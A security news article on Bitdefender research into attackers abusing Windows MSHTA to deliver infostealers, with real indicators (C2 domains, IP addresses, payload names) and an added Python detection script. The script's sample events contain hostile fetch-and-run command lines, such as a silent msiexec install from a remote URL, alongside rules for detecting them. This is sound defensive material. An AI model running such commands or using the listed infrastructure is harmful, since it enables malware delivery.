An old Windows tool called MSHTA is being exploited by hackers to infect systems with malware, reveals the latest research from Bitdefender. Reportedly, this tool, which was created to work with Internet Explorer (IE), remains enabled by default on Windows computers despite IE’s retirement in 2022, mainly so that older software keeps running.
Attack Patterns
Bitdefender’s research, shared with Hackread.com, highlights that threat actors are actively abusing MSHTA as a Living-off-the-Land binary (LOLBIN), enabling them to carry out fileless attacks. They can execute malicious VBScript and JavaScript code directly in the computer’s memory while making the activity look like legitimate administrative tasks.
These fileless attack chains rely on common social engineering tricks like ClickFix scams and fake software downloads. For example, in one campaign, fake Google ads for Claude Code were used to lure victims, and in another, attackers bundled malware into pirated downloads of the movie One Battle After Another.
Typically, attackers have MSHTA launch a hidden command shell, which contacts specific IP addresses to fetch and execute malicious packages via the Microsoft Installer.
The Types of Threats Discovered
Further investigation revealed that MSHTA helps deliver several different types of malware; some are designed to steal passwords, browser data, and cryptocurrency wallet information from unsuspecting users, while others are more advanced threats that can stay hidden on a computer for a long time to spy on users.
For example, a program called CountLoader was seen using this method to drop information-stealing software like LummaStealer and Amatera onto devices. This involved using a zip archive with a legitimate Python interpreter renamed as Setup.exe to load a malicious script (.\Lib\encodings\aliases.py), which launches a renamed MSHTA file (iso2022.exe) to connect to C2 domains like google-services.cc, explorer.vg, and ccleaner.gl.
Similarly, Emmenhtal Loader uses phishing links on Discord to send victims to fake reCAPTCHA verification sites like humancheck.shop and eventually runs the LummaStealer payload.
Another threat called PurpleFox uses this utility to quietly download a malicious MSI package disguised as a .png file (3EBCE3A4.png) for data theft.
MSHTA is also abused by ClipBanker to hijack cryptocurrency wallet addresses via a remote file (checking.hta) that downloads persistence scripts named checking.ps1 and ichigo-lite.ps1. These scripts are fetched from the IP addresses 185.208.159.199 and 87.96.21.84 and are registered as scheduled tasks so that they pass as legitimate services.
However, researchers pointed out that not all instances of this activity are malicious, because most detections actually stem from legitimate software performing updates.
“Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack’s update mechanism… that downloads driver files from third-party sources rather than through official Microsoft update channels. This is an important reminder that MSHTA usage is not automatically malicious,” the blog post reads.
Microsoft plans to fully retire VBScript by 2027, but no public timeline has been given for its removal. Until that happens, Bitdefender therefore recommends that organisations restrict or block mshta.exe and wscript.exe in environments where they are not operationally required.
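The attack patterns above (a renamed MSHTA binary, MSHTA pointed at remote content, MSHTA spawning a command shell that pulls an MSI package) and the DriverPack caveat translate into a small set of process-creation triage rules. The following is an added example, not Bitdefender’s or Hackread’s code; the Sysmon-style records, the 203.0.113.x addresses and the PLACEHOLDER updater path are constructed, and the allowlist is a stand-in for an organisation’s own inventory of software that legitimately uses MSHTA.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Local\Temp\Setup\iso2022.exe",   # renamed mshta.exe
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"iso2022.exe http://203.0.113.10/checking.hta",
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\Setup\Setup.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",                         # shell spawned by MSHTA
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c msiexec /i http://203.0.113.10/3EBCE3A4.png /quiet",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",                       # legitimate updater (placeholder)
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"mshta.exe http://203.0.113.20/update.hta",
     "ParentImage": r"C:\Program Files\PLACEHOLDER\updater.exe"},
]

# Placeholder allowlist of parent processes known to use MSHTA legitimately (e.g. a
# driver updater). In production, pair each entry with a code-signing check.
ALLOWLISTED_PARENTS = {r"c:\program files\placeholder\updater.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# URL or UNC path on the command line: content is coming from off the host.
REMOTE = re.compile(r"https?://|\\\\[^\\]+\\", re.IGNORECASE)

def basename(path):
    return PureWindowsPath(path).name.lower()

def triage(event, allowlist=ALLOWLISTED_PARENTS):
    """Return the rule names this event matches; an empty list means no finding."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    is_mshta = event.get("OriginalFileName", "").lower() == "mshta.exe"
    hits = []
    if is_mshta and image != "mshta.exe":          # PE header says MSHTA, file name does not
        hits.append("renamed_mshta")
    if is_mshta and REMOTE.search(cmd):            # MSHTA fetching a remote .hta / script
        hits.append("mshta_remote_content")
    if parent == "mshta.exe" and image in SHELLS:  # hidden command shell under MSHTA
        hits.append("mshta_spawned_shell")
    if parent == "mshta.exe" and "msiexec" in cmd.lower() and REMOTE.search(cmd):
        hits.append("msi_from_remote_url")         # package pulled via Microsoft Installer
    # Known-good parent suppresses the finding (the DriverPack-style false positive).
    if hits and event["ParentImage"].lower() in allowlist:
        return []
    return hits

def triage_all(events, allowlist=ALLOWLISTED_PARENTS):
    return [triage(e, allowlist) for e in events]
```

Running `triage_all(SAMPLE_EVENTS)` flags the first two records and suppresses the third; passing `allowlist=set()` shows the same updater record would otherwise trip the remote-content rule.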
